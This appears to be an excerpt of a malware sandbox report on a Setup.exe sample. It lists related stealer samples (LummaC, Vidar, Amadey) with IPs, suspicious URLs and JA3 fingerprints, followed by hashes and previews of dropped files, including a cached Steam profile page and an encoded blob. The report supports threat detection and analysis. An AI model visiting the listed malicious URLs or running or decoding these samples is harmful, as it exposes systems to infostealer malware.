	https://specificallycries.com/askyhgxe?stixna=48&refer=https%3A%2F%2Fwww.bodyvitalspa.com%2F&kw=%5B%22welcome%22%2C%22to%22%2C%22body%22%2C%22vital%22%2C%22foot%22%2C%22spa%22%2C%22-%22%2C%22body%22%2C%22vital%22%2C%22foot%22%2C%22spa%22%5D&key=0b0f64ea0800e4174573a0e17513102f&scrWidth=1920&scrHeight=1080&tz=-5&v=24.12.6652&ship=&psid=www.bodyvitalspa.com,www.bodyvitalspa.com&sub3=invoke_layer&res=14.31&dev=r&adb=n&uuid=64597ca1-acf8-4c16-8774-db4c7f843adf%3A3%3A1&adb=n	Get hash	malicious	Anonymous Proxy	Browse	172.217.19.206
	5diately.msg	Get hash	malicious	Unknown	Browse	172.217.19.206
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	172.217.19.238
	uLkHEqZ3u3.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse	172.217.19.206
	gVMKOpATpQ.exe	Get hash	malicious	Unknown	Browse	172.217.19.206
steamcommunity.com	Vq50tK1Nx2.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	IzDjbVdHha.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	23.55.153.106
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	RUUSfr6dVm.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	23.55.153.106
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	grand-theft-auto-5-theme-1-installer_qb8W-j1.exe	Get hash	malicious	Unknown	Browse	184.85.182.130
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	23.55.153.106
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	23.55.153.106
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	23.209.72.25
	installer.bat	Get hash	malicious	Vidar	Browse	23.209.72.7
CLOUDFLARENETUS	http://proxyium.com	Get hash	malicious	Unknown	Browse	104.21.80.92
	https://cbhc9.anguatiab.ru/RpweC/	Get hash	malicious	Unknown	Browse	1.1.1.1
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.148.171
	search.hta	Get hash	malicious	Unknown	Browse	172.67.153.170
	http://bitstampweb.0532tg.com	Get hash	malicious	Unknown	Browse	172.67.133.12
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse	172.66.0.145
	SET_UP.exe	Get hash	malicious	LummaC	Browse	172.67.152.152
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.89.250
	@Setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.41

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	setup.msi	Get hash	malicious	Unknown	Browse	23.55.153.106 104.21.2.114
	search.hta	Get hash	malicious	Unknown	Browse	23.55.153.106 104.21.2.114
	TrdIE26br9.msi	Get hash	malicious	Unknown	Browse	23.55.153.106 104.21.2.114
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	23.55.153.106 104.21.2.114
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106 104.21.2.114
	EB2UOXRNsE.exe	Get hash	malicious	Unknown	Browse	23.55.153.106 104.21.2.114
	gshv2.exe	Get hash	malicious	Unknown	Browse	23.55.153.106 104.21.2.114
	DOTA2#U89c6#U8ddd#U63d2#U4ef6.exe	Get hash	malicious	Unknown	Browse	23.55.153.106 104.21.2.114
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	23.55.153.106 104.21.2.114
	InExYnlM0N.lnk	Get hash	malicious	Unknown	Browse	23.55.153.106 104.21.2.114

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Setup.exe_All My_5fbe40f63b64d584b938a1eb405139b9fd77314b_7774cee5_32dc2cbd-968f-4915-9216-e533bd805671\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1711687453124584
Encrypted:	false
SSDEEP:	192:rF25w1/X0NXU6j3RV6+mzuiFtZ24IO8z:k5Y/kNXU6jpmzuiFtY4IO8z
MD5:	1906287D5303D413AAECEA666E0D28F7
SHA1:	7172BB02E26E23088FA05C6668E9D007958287D9
SHA-256:	3B9B239108BD14C5D704AEBBEE8091FA577758F2FC5541BDB383617CB98C0B3E
SHA-512:	61B824BFF88F0383D4B1471BE740BF0F7C33034E26A703795C3842110FE9C0513C1C67D2BEB844B0D975906E5BA281047E115077C0C3DDF71CA34C3F79046A06
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.0.4.4.2.7.5.2.6.6.6.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.0.4.4.2.8.1.1.1.2.0.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.d.c.2.c.b.d.-.9.6.8.f.-.4.9.1.5.-.9.2.1.6.-.e.5.3.3.b.d.8.0.5.6.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.b.6.c.a.7.5.-.c.2.f.2.-.4.c.5.d.-.b.b.b.f.-.7.e.e.7.8.7.3.d.5.2.e.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.t.u.p...e.x.e._.A.l.l. .M.y. .B.o.o.k.s.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.f.4.-.0.0.0.1.-.0.0.1.4.-.a.3.5.8.-.a.5.b.5.9.c.5.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.1.e.1.3.4.0.6.e.6.7.e.6.e.7.a.b.2.f.7.a.0.6.c.0.8.e.a.c.c.7.f.0.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Setup.exe_All My_a8c2553b49bfdb288d2c0942c3208ff4d1873e_7774cee5_83f8a73e-cba2-40af-b7fb-5b0baef4ce40\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1696322374235304
Encrypted:	false
SSDEEP:	192:UjlS5w18en0mCichbrj3RV6+mzuiFtZ24IO8z:j5Y8e0mAbrjpmzuiFtY4IO8z
MD5:	500187A9D15641CE38A8443FA2284DFB
SHA1:	50FA5DB2C46AF1EE46072B3E88EB817798C6287B
SHA-256:	5B50C7CBC0A01FB7E9CA562B4D4C4461DA3E0BBD5EAC50634483225A1DCD90CD
SHA-512:	C7FFA1B6E05B490DCA8CA84F1B37B4ECD65692AF5B4D8654D9BE20AA17EA796EDFA77270620ECB355374B03FC74A6F4EFDF9B07EAE8E22641F5659153C9C2FAF
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.0.4.4.5.7.9.3.5.3.9.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.0.4.4.5.8.4.5.5.1.8.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.f.8.a.7.3.e.-.c.b.a.2.-.4.0.a.f.-.b.7.f.b.-.5.b.0.b.a.e.f.4.c.e.4.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.6.1.2.7.2.5.-.0.7.c.e.-.4.b.0.e.-.8.3.7.5.-.7.4.2.3.1.4.d.a.d.3.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.t.u.p...e.x.e._.A.l.l. .M.y. .B.o.o.k.s.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.f.4.-.0.0.0.1.-.0.0.1.4.-.a.3.5.8.-.a.5.b.5.9.c.5.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.1.e.1.3.4.0.6.e.6.7.e.6.e.7.a.b.2.f.7.a.0.6.c.0.8.e.a.c.c.7.f.0.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3656.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 27 20:20:27 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	127822
Entropy (8bit):	2.085621591681652
Encrypted:	false
SSDEEP:	768:gWbQ4cYttxbjogTaDdL5Sm+ZjcRhUjoX0V47BShBa+r:guQV+XUgOdL5R+ZoRhUjoX0V47Bua+
MD5:	E54A3BFF092D17606D7FE69EFE3DD417
SHA1:	672826F8D0840F8B4EC32742601822EA3D106865
SHA-256:	A5417327EA477C3181A389816450629E3AB352ABC99AFA102551D3D5E4F8846D
SHA-512:	F1A39148739715248861C7B923E6EAA8C18606BAA0679BED0208A4590A5CFD0A0EAC5FED7237086FDFF64E21378701D32CCA54F5EDC6118EBC68570DC0643CF2
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........og............D...........0"..X.......$....+...........[..........`.......8...........T............[..N............+...........-..............................................................................eJ......0.......GenuineIntel............T.............og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37AF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8376
Entropy (8bit):	3.700637832872789
Encrypted:	false
SSDEEP:	192:R6l7wVeJBe6Kwa6Y9hSU9TMGgmf9kprt89btRsfKsvm:R6lXJo6A6Y7SU9Ttgmf9LtKfY
MD5:	C9F573ED27B407E4D6F0BFA628F6DA09
SHA1:	773D82B268856D3FEAFADDF38C62D56E070B3607
SHA-256:	A1BF54A0721EC838EF6D3C16FCAF6BEB5FB16B1012F200F8143DE055F1F79F5F
SHA-512:	CBE5D92E5C0ADA643E2D642F68117B6D1A4959A54017AD9EF514F47D77CE9A3F4D89568065F5F8DB471B81C71AFE91E11749F5E5FEDBF23D1D9BC759164ED697
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37DF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4746
Entropy (8bit):	4.4694615100504045
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg77aI9atWpW8VY4PYm8M4JeXKeFS+q8IXKg7tQ1Rd:uIjfpI7oc7VpSJeX6vXv+1Rd
MD5:	7EDEE0F4AD4B92375FCD239C383396DD
SHA1:	5CEDF3F7487EE9535BDC4AA5F563C7A3AA872878
SHA-256:	82A3372223868C9C457AE02DF5A163E8AC3BDFD7F05A6DD3EA71B7C257A1E6EF
SHA-512:	D8D5F6DD27BA471AF00D3A05A0715C659737FC6427F2A4E4EFAD7ED53E47F2A948994E0585F67B8FB6BDB43F481DD17106BD7B026E8195D1330C694F9B5D9031
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650123" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD1D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 27 20:20:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	124086
Entropy (8bit):	2.1047947907869977
Encrypted:	false
SSDEEP:	768:IubQ4cYgxbjo9VprL5SePWjSrEkKgSYw/3oxws:IWQVrU93rL55PWerEkKgXw/3oSs
MD5:	3331C19B730E916EA4E1AD4B401D6290
SHA1:	009BCCDCE63A220F76655E03B49E2A4F2A1EF84A
SHA-256:	972029569C18561BE26AB112C53B7E51F5C24E595387A4E08054791C3CBBACE3
SHA-512:	43499804382A9141899F2D46948F4375EBCE539C62031F5FA89251C43994E06842C65DE65B8402926A36A1E38A237CF8DB2007D51EB8D35BB3EB8559E07D4694
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......*.og............D...........0"..X.......$....+...........[..........`.......8...........T...........8Z..~............+...........-..............................................................................eJ......0.......GenuineIntel............T.............og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE08.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.6991886038856765
Encrypted:	false
SSDEEP:	192:R6l7wVeJBB6KMOi6Y9YSU97gmf4443icEpDw89bNRsfHvm:R6lXJ3616YiSU97gmf444oNKfu
MD5:	84A46E7D31DE32B4155388F915C41D4F
SHA1:	C8483B89C2B9F754B48837FCF32A1A8F1507ACF9
SHA-256:	BB8A14ACD9B8B5C6107E7C993AE083676CB71A152B6E6CFA5E2ACED73D1F2EAF
SHA-512:	3CE5BAD38D90075EC8FE4F43D77E9CA9121CC4D9DE4C2814DE7E8CF429953289DF69603957C936649C9428E27C84D095C13B88287030DC709FA6524C2AC7877A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE57.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4722
Entropy (8bit):	4.456373751362143
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg77aI9atWpW8VYVPYm8M4JeXK/FA+q8IXrY7tQ1Rd:uIjfpI7oc7VgSJeX5vXM+1Rd
MD5:	B03EBDF81A1BDBCBBBBF0C4D5D71067C
SHA1:	B608B2076006DC6C79E6ABAC863ABA00F2DBD63E
SHA-256:	040ABD473D460693EFCB969C9EEDF6B89D98BD12F6B0E9474FAA51563B8AB804
SHA-512:	67F8B89AFE98FB7DF2E02A8369F065B0240A4293B477D51CB026689981FBC50D08D418D55FAAC2C719BA2A55F7397715F9D608E027AF17CACE8ABB8D822719D3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650123" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680660089[1].htm

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3188)
Category:	dropped
Size (bytes):	35329
Entropy (8bit):	5.379343626449626
Encrypted:	false
SSDEEP:	768:ifBpqhYGM4evx83TfwtunNS3FPaXfsW9l+X9hJYFnzOMD5QBdxaXfsW9l+X9hJYn:KB8hYGM4evx83Tfwtun8PaXfsW9l+X9o
MD5:	A10EF7EC286C4084B0844A8CD2BE6B5F
SHA1:	217B89870C66BCDB1707E5AB21213202767DC74D
SHA-256:	82D571998D740E1F26AD0DA1AEBCAA70A2CF7367C5CC3FBE65B3D79B0C3167BE
SHA-512:	44F096F3C70AD7C0A09A97A228F6E499BF0210866C540C090CB8A1168E50502AF14D831C89FA677D161E3455C1819D62E736A86DBDA8B5909E8F75062639DF50
Malicious:	false
Preview:	<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: r5q cmFzMi5zaG9wt6t</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=english&_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=english&_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cdn=fastly" re

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\f1575b64-8492-4e8b-b102-4d26e8c70371[1].txt

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	ASCII text, with very long lines (30928), with no line terminators
Category:	dropped
Size (bytes):	30928
Entropy (8bit):	5.443822786604349
Encrypted:	false
SSDEEP:	768:yFvPUMUHoRcE6fVSZSu4PbqGXan43ExEqB7L:y9P1RcffVSZpig2uv
MD5:	2928EFC088594ACABC759E97008D95FC
SHA1:	15291388DC125686205796DC544CEFA5703BDB55
SHA-256:	38D6EB08CC649AD11A1A23203B33CC526DA438A57E373673D44F8B5EEAFE64B4
SHA-512:	0290E2FD0567EC82D2EBBB4AC19339940F910545F4E6FD0E9E55FC0FFAFB3817CB3DDC08C9EED4A2E6C1AAABCE21A4B791302262D804F22019AE795196CC70D8
Malicious:	false
Preview:	QxdQEw5iTBBdIgIXUG1oWg8QHyJIFwgTaGV7XVBhVGludltWUF5WXGR2WkNbVFJub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXUVlGVlpXHWVAUBBMGEIVXBE6GldubVcBFR4RcBoPEG1odVhRUmxkaXVeW15bV29ce11AXllcF2FLU2RpZ0JRSxd2UnRZFx4TQBsNAx8iSFsQCxZaX0BcbV0bV0lRG0oeSCJWFwgTVmVrUQsiFBdCEw4ba25/b1tUXm1oflhdVGxdaW5yXEtYX1YgelBGUGhlYkFWchhxU0VVGxsQRyICBB4TRFcVCBFjUEddXFEXUkpWIkUZSRNaGw0QUVxkVgoTGBtHEAkiZGl+XldYW25vR1daVV1RZWtxW3JXWFcRcFxBbm9VS1BAEXBYQ1MRLBpBEAsFFRVCXSICF1FZRlZaVx1lQFAQTBhCFVwROhpXbm1XARUeEXAaDxBtaHVYUVJsZGl1XlteW1dvXHtdQF5ZXBdnXXNMVFBdUWVrZ0BlShV2UEBYFR4RdBoPAx0WSVkQCSJbXUBeWVwZV0tlGkgeShZXFQgRYmRpUQkWFRVCEToaaW59W1pWXm9cf1pdVlhca25waEpaX1QUelZcUnJBaW5kR1xFEndhTFQQHRZNFQgCLBpFXBMOG1RaQW9VUBxUTFwVTx97GlsQCxZba25QMggXHhNEGw0Qb1x0WlFQWGVrd0NpWxViQ11PVlFKIHpHXUZHXEVub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXV0FdWhlXS2UaSB5KFlcVCBFiZGlRAAEbGxBDIgIXbm14VlRTX1xkY1tHVVVTW29cbUZXQxR9VkZSIhQXRhMOCBsQQ24aDxBHXU9WXldpFlBKVBZEG0kRbhoPEFNoZVQABSIUF0ITDhtrbn9vW1RebWgKAQJxcldCQVRGZWtwQW9PRldDaGViQVZyGHFTRVUbGxBHIgIEHhNEVxUIEWJKWkVCUUsEBAMu

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466307839681253
Encrypted:	false
SSDEEP:	6144:dIXfpi67eLPU9skLmb0b4NWSPKaJG8nAgejZMMhA2gX4WABl0uNHdwBCswSb/:OXD94NWlLZMM6YFH1+/
MD5:	CC457035D283687126DA7CAB2487EC44
SHA1:	8666FE9C5D5DCEFDC74B1D227967049CBD19FF48
SHA-256:	B86B2ED64812905AA32BD8F31FD34D5034AB3B9CEE9049ACA5669177DF7F8574
SHA-512:	58958FA2009524F38F02A1346396B3A7BE42394607312BD9FEF743FE20A306E86E7C0DF111788B748BB166A71478785DBC0EDB18898EEC48E7478B5BEE86B234
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...X...............................................................................................................................................................................................................................................................................................................................................,..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	165
Entropy (8bit):	4.796875569830137
Encrypted:	false
SSDEEP:	3:Vwp+EHwwBHsLpYJWriFGHTe4TCViHJKCwGWjLwWkzXFETH1u4:VwQEH5BHsL2YriFGHTFCV1CwGAwWeXFy
MD5:	2226501CADB2E282C1C4089B3CA12344
SHA1:	18D94BBFF6F52F63BA85E504EE1F4935320B660E
SHA-256:	AB4608812D92A1F5033542B32BB98932994BE82C2F9ACA57960DE3A0B00DBD3A
SHA-512:	DB1EE7C0E1B13778439679F94C4153C2580CE311A7A071CD47ABDF2078DF908E1BE0415A13F42C32D78DF6411640FBE080FC29606690D67E8B3A83DAD90BBA8C
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",[],[],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggesteventid":6099042045979870049,"google:suggesttype":[],"google:verbatimrelevance":851}]

Chrome Cache Entry: 73

Download File

